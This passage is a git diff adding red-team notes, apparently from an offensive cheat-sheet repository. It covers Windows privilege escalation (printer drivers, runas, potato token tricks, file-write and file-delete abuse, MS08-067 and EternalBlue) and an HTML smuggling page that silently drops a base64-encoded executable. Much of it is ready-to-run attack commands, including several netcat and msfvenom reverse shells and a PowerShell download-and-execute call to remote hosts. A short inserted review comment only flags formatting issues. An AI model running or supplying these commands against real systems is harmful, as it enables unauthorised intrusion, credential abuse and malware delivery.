the driver + +```ps1 +$serverName = 'dc.purple.lab' +$printerName = 'Universal Priv Printer' +$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +Remove-Printer -Name $fullprinterName 
-ErrorAction SilentlyContinue +Add-Printer -ConnectionName $fullprinterName +``` + +### PrinterNightmare + +```ps1 +git clone https://github.com/Flangvik/DeployPrinterNightmare +PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell +[<3] @Flangvik - TrustedSec +[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Adding printer driver => Generic / Text Only! +[+] Adding printer => EasySystemShell! +[+] Setting 64-bit Registry key +[+] Setting 32-bit Registry key +[+] Setting '*' Registry key +``` + +```ps1 +PS C:\target> $serverName = 'printer-installed-host' +PS C:\target> $printerName = 'EasySystemShell' +PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue +PS C:\target> Add-Printer -ConnectionName $fullprinterName +``` + +### Bring Your Own Vulnerability + +Concealed Position : https://github.com/jacob-baines/concealed_position + +* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE +* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE +* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE +* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE + +```powershell +cp_server.exe -e ACIDDAMAGE +# Get-Printer +# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing" +cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE 
+cp_client.exe -l -e ACIDDAMAGE +``` + +## EoP - Runas + +Use the `cmdkey` to list the stored credentials on the machine. + +```powershell +cmdkey /list +Currently stored credentials: + Target: Domain:interactive=WORKGROUP\Administrator + Type: Domain Password + User: WORKGROUP\Administrator +``` + +Then you can use `runas` with the `/savecred` options in order to use the saved credentials. +The following example is calling a remote binary via an SMB share. +```powershell +runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" +runas /savecred /user:Administrator "cmd.exe /k whoami" +``` + +Using `runas` with a provided set of credential. + +```powershell +C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" +``` + +```powershell +$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$computer = "" +[System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) +``` + +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + +## EoP - From local administrator to NT SYSTEM + +```powershell +PsExec.exe -i -s cmd.exe +``` + +## EoP - Living Off The Land Binaries and Scripts + +Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/ + +> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. 
+ +A LOLBin/Lib/Script must: + +* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. +Have extra "unexpected" functionality. It is not interesting to document intended use cases. +Exceptions are application whitelisting bypasses +* Have functionality that would be useful to an APT or red team + +```powershell +wmic.exe process call create calc +regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll +Microsoft.Workflow.Compiler.exe tests.xml results.xml +``` + +## EoP - Impersonation Privileges + +Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. + +| Privilege | Impact | Tool | Execution path | Remarks | +| --- | --- | --- | --- | --- | +|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [AurĂŠlien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | +|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP

- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.

- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | +|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || +|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | +|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | +|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | +|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | +|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || + +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + +### RottenPotato (Token Impersonation) + +* Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) +* Exploit using Metasploit with `incognito mode` loaded. 
+ ```c + getuid + getprivs + use incognito + list\_tokens -u + cd c:\temp\ + execute -Hc -f ./rot.exe + impersonate\_token "NT AUTHORITY\SYSTEM" + ``` + +```powershell +Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" +Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" +``` + + +### Juicy Potato (Abusing the golden privileges) + +> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato** +> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato** + +* Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases) + +1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) + + ```powershell + whoami /priv + ``` + +2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object + + * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) + * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise) + * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise) + * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro) + * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) + * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter) + * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) + +3. Execute JuicyPotato to run a privileged command. 
+ + ```powershell + JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} + JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} + JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" + Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 + ...... + [+] authresult 0 + {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM + [+] CreateProcessWithTokenW OK + ``` + +### Rogue Potato (Fake OXID Resolver) + +* Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) + +```powershell +# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port +socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 + +# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. +# Use this if you have fw restrictions. 
+RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" + +# RoguePotato all in one with RogueOxidResolver running locally on port 9999 +RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 + +#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename +RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode +``` + +### EFSPotato (MS-EFSR EfsRpcOpenFileRaw) + +* Binary available at https://github.com/zcgonvh/EfsPotato + +```powershell +# .NET 4.x +csc EfsPotato.cs +csc /platform:x86 EfsPotato.cs + +# .NET 2.0/3.5 +C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs +C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs +``` + +### JuicyPotatoNG + +* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) + +```powershell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt +``` + + +### PrintSpoofer (Printer Bug) + +> this work if SeImpersonatePrivilege is enabled + +* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0 + +```powershell +# run nc -lnvp 443 then : +.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd" +# without listener +.\PrintSpoofer64.exe -i -c cmd +# Via RPD +.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass" +``` + +## EoP - Privileged File Write + +### DiagHub + +:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs. + +The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. +This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory. + +#### Exploit + +1. 
Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32` +2. Build https://github.com/xct/diaghub +3. `diaghub.exe c:\\ProgramData\\ payload.dll` + +The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe` + +Alternative tools: +* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag +* https://github.com/decoder-it/diaghub_exploit + + +### UsoDLLLoader + +:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. + +> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo) + +If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**. + +#### Exploit + +1. Build https://github.com/itm4n/UsoDllLoader + * Select Release config and x64 architecure. + * Build solution. + * DLL .\x64\Release\WindowsCoreDeviceInfo.dll + * Loader .\x64\Release\UsoDllLoader.exe. +2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\` +3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337. + + +### WerTrigger + +> Exploit Privileged File Writes bugs with Windows Problem Reporting + +1. Clone https://github.com/sailay1996/WerTrigger +2. Copy `phoneinfo.dll` to `C:\Windows\System32\` +3. Place `Report.wer` file and `WerTrigger.exe` in a same directory. +4. Then, run `WerTrigger.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + +### WerMgr + +> Exploit Privileged Directory Creation Bugs with Windows Error Reporting + +1. Clone https://github.com/binderlabs/DirCreate2System +2. Create directory `C:\Windows\System32\wermgr.exe.local\` +3. 
Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` +4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + + +## EoP - Privileged File Delete + +During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create: + +* a folder at `C:\Config.Msi` containing + * a rollback script (`.rbs`) + * a rollback file (`.rbf`) + +To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service. +* delete the protected `C:\Config.Msi` folder immediately after it's created by the Windows Installer +* recreate the `C:\Config.Msi` folder with weak DACL permissions since ordinary users are allowed to create folders at the root of `C:\`. +* drop malicious `.rbs` and `.rbf` files into it to be executed by the MSI rollback +* then upon rollback, Windows Installer will make arbitrary changes to the system + +The easiest way to trigger this chain is using [thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem). +The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. + +Then switch to the secure desktop using `[CTRL]+[ALT]+[DELETE]` and open the On-Screen Keyboard (`osk.exe`). +The `osk.exe` process first looks for the `C:\Program Files\Common Files\microsoft shared\ink\HID.dll` library instead of `C:\Windows\System32\HID.dll` + + +## EoP - Common Vulnerabilities and Exposure + +### MS08-067 (NetAPI) + +Check the vulnerability with the following nmap script. 
+ +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 +``` + +Metasploit modules to exploit `MS08-067 NetAPI`. + +```powershell +exploit/windows/smb/ms08_067_netapi +``` + +If you can't use Metasploit and only want a reverse shell. + +```powershell +https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows + +Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 +Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) +Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal +Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English +Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) +Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) +Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) +python ms08-067.py 10.0.0.1 6 445 +``` + + +### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 + +'KiTrap0D' User Mode to Ring Escalation (MS10-015) + +```powershell +https://www.exploit-db.com/exploits/11199 + +Metasploit : exploit/windows/local/ms10_015_kitrap0d +``` + +### MS11-080 (afd.sys) - Microsoft Windows XP/2003 + +```powershell +Python: https://www.exploit-db.com/exploits/18176 +Metasploit: exploit/windows/local/ms11_080_afdjoinleaf +``` + +### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 + +```powershell +printf("[#] usage: ms15-051 command \n"); +printf("[#] eg: ms15-051 \"whoami /all\" \n"); + +# x32 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe + +# x64 
+https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe + +https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 +use exploit/windows/local/ms15_051_client_copy_image +``` + + +### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) + +Check if the patch is installed : `wmic qfe list | findstr "3139914"` + +```powershell +Powershell: +https://www.exploit-db.com/exploits/39719/ +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 + +Binary exe : https://github.com/Meatballs1/ms16-032 + +Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc +``` + +### MS17-010 (Eternal Blue) + +Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 +``` + +Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. + +```powershell +auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution +auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection +exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption +exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ +exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution +``` + +If you can't use Metasploit and only want a reverse shell. 
+ +```powershell +git clone https://github.com/helviojunior/MS17-010 + +# generate a simple reverse shell to use +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe +python2 send_and_execute.py 10.0.0.1 revshell.exe +``` + +### CVE-2019-1388 + +Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html + +Requirement: +- Windows 7 +- Windows 10 LTSC 10240 + +Failing on : +- LTSC 2019 +- 1709 +- 1803 + +Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege + + +## References + +* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) +* [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) +* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) +* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) +* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) +* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) +* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) +* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) +* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) +* [Remediation for Microsoft Windows Unquoted Service Path Enumeration 
Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) +* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) +* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) +* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) +* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) +* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) +* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) +* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) +* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) +* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) +* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) +* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) +* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) +* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) +* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) +* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) +* [Common Windows Misconfiguration: Services - 2018-09-23 - 
@am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/) +* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) +* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) +* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) +* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) +* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) +* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) +* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) +* [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_ 
](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all) +* [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) +* [MSIFortune - LPE with MSI Installers - Oct 3, 2023 - PfiatDe](https://badoption.eu/blog/2023/10/03/MSIFortune.html) +* [MSI Shenanigans. Part 1 – Offensive Capabilities Overview - DECEMBER 8, 2022 - Mariusz Banach](https://mgeeky.tech/msi-shenanigans-part-1/) +* [Escalating Privileges via Third-Party Windows Installers - ANDREW OLIVEAU - JUL 19, 2023](https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers) +* [Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter - ANDREW OLIVEAU - SEP 11, 2023](https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities) +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - Simon Zuckerbraun - March 17, 2022 ](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) \ No newline at end of file diff --git a/docs/redteam/HTML Smuggling.md b/docs/redteam/HTML Smuggling.md new file mode 100644 index 0000000..cb90d11 --- /dev/null +++ b/docs/redteam/HTML Smuggling.md 
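Review bot: the References list of `Windows - Privilege Escalation.md` carries a duplicate entry: the ZDI post "ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS" appears once as `March 17, 2022 | Simon Zuckerbraun` and again as the final bullet with the same URL, so one of them should go. Two smaller points in the same list: the Printer entry has a stray closing parenthesis (`AUGUST 2, 2021)`), and the file is committed without a trailing newline (`\ No newline at end of file`), which will show up as noise in the next diff touching it. In the CVE-2019-1388 section `Exploit :`, `Failing on :` and `vulnerability :` put a space before the colon while `Requirement:` in the same section does not; pick one style.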
@@ -0,0 +1,43 @@ +# HTML Smuggling + +## Summary + +- [Description](#description) +- [Executable Storage](#executable-storage) + + +## Description + +HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file. + +## Executable storage + +We can store our payload in a Blob object => JS: `var blob = new Blob([data], {type: 'octet/stream'});` +To perform the download, we need to create an Object Url => JS: `var url = window.URL.createObjectURL(blob);` +With those two elements, we can create with Javascript our \ tag which will be used to download our malicious file: +```Javascript +var a = document.createElement('a'); +document.body.appendChild(a); +a.style = 'display: none'; +var url = window.URL.createObjectURL(blob); +a.href = url; +a.download = fileName; +a.click(); +window.URL.revokeObjectURL(url); +``` + +To store ou payload, we use base64 encoding: +```Javascript +function base64ToArrayBuffer(base64) { + var binary_string = window.atob(base64); + var len = binary_string.length; + var bytes = new Uint8Array( len ); + for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } + return bytes.buffer; +} + +var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA... +var data = base64ToArrayBuffer(file); +var blob = new Blob([data], {type: 'octet/stream'}); +var fileName = 'NotAMalware.exe'; +``` \ No newline at end of file diff --git a/docs/redteam/Linux - Evasion.md b/docs/redteam/Linux - Evasion.md new file mode 100644 index 0000000..8ed2089 --- /dev/null +++ b/docs/redteam/Linux - Evasion.md 
